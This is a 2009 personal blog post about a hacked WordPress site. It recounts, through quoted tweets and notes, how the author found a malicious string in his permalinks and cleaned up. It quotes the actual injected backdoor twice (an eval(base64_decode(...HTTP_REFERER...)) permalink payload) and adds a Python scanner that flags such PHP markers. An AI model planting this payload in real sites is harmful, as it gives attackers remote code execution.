Update on WP hack

by Justin Souter on September 6, 2009


For those of you who follow me via my @souterconsults account, you will have seen me have a paddy on this Friday last. That’s because my WP instance got hacked. Meh :$

So, I thought it would be useful to update anyone interested with a quick run-down, as it sets the scene for any future developments (like a complete re-build: bah).

I’m setting out here:

  • List of tweets, which pretty much explain what happened
  • Brief notes of more detail
  • Other links, if they’re not in the first two sections
  • Actions. Bah


  1. argh, wanting to publish my Cloud vids from YouTube, but WP is putting %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ on URL 3:15 PM Sep 4th from twhirl
  2. http://twurl.nl/06n2fh explains – I’m trying to find the malicious code asap :'( 3:42 PM Sep 4th from twhirl
  3. ok, I’ve switched off the navigation on the site & parked links to comments, archive, & recent posts to help avoid people getting borked 4:02 PM Sep 4th from twhirl
  4. Site back in action: WP Permalink config restored – http://twurl.nl/ddfchd fyi ‘Hardening WordPress’ http://twurl.nl/ih81jk 5:09 PM Sep 4th from twhirl
  5. just blogged: Cloud Computing – YouTube videos http://twurl.nl/g38ukl 5:23 PM Sep 4th from twitterfeed
  6. Links for WP hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ again – http://twurl.nl/5qclh3 & http://twurl.nl/d55o4c 5:39 PM Sep 4th from twhirl


  1. Was posting about YouTube videos on Cloud Computing
  2. Copying and pasting the URL into Twhirl to send out on Twitter
  3. Noticed there was a whole string of characters after the ‘proper’ URL
  4. Deleted post
  5. Republished
  6. It was still there
  7. Copied the string and Googled it
  8. Found “[resolved] NASTY CODE hacks onto your domain. FIX included.” #2 in ‘Tweets’
  9. Went on from there & blogged original post…

Looking at my install:

  • The plugin options table seems to have disappeared [although this may not be a bad thing – I should check the WP changelog…]
  • WP pages seem clean at the mo’

Various links

Worthwhile checking out


  • Need to do several more, more detailed trawls through my WP install
  • Probably need to do a rebuild (from scratch, preferably). Meh
  • Enabled various plugins, e.g. Login LockedDown, but Maintenance Mode didn’t work :-(
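
A first-pass check for the kind of trawl listed above, as an added example that is not from the original post: it audits permalink option values (as exported from the `wp_options` table) against the standard WordPress structure tags and flags PHP constructs such as the `eval(base64_decode(...))` string from the tweets. The allowlist, the marker list, the function names and the sample rows are assumptions made for illustration.

```python
import re

# Standard WordPress permalink structure tags (assumed allowlist).
ALLOWED_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
                "post_id", "postname", "category", "author"}
# PHP constructs that never belong in a URL pattern (illustrative list).
CODE_MARKERS = ("eval(", "base64_decode(", "${", "$_server")

TAG_RE = re.compile(r"%([^%/]*)%")
PLAIN_PATH_RE = re.compile(r"[A-Za-z0-9._/-]*")


def audit_permalink(structure):
    """Return a list of findings; an empty list means the value looks clean."""
    findings = []
    lowered = structure.lower()
    for marker in CODE_MARKERS:
        if marker in lowered:
            findings.append("PHP construct present: " + marker)
    for tag in TAG_RE.findall(structure):
        if tag not in ALLOWED_TAGS:
            findings.append("unknown structure tag: %" + tag + "%")
    # Whatever remains after removing %tags% must be plain path characters.
    if not PLAIN_PATH_RE.fullmatch(TAG_RE.sub("", structure)):
        findings.append("characters outside the plain URL path set")
    return findings


def scan_options(rows):
    """Map option name -> findings for every option value that is flagged."""
    return {name: f for name, value in rows.items()
            if (f := audit_permalink(value))}


# Constructed sample rows; the suffix on the first is the string from the tweets.
SAMPLE_ROWS = {
    "permalink_structure": "/%year%/%monthnum%/%postname%/"
        "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
    "category_base": "topics",
}

if __name__ == "__main__":
    for option, findings in scan_options(SAMPLE_ROWS).items():
        for finding in findings:
            print(option + ": " + finding)
```

A clean result here only covers the permalink-related options; theme files, plugin files and user accounts still need their own review.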

A shot across the bows, hopefully not much more (fingers tightly crossed).

[UPDATE: fyi I believe I was on WP v2.8.0 when I was hacked. Latest version at the time of writing is 2.8.4.]
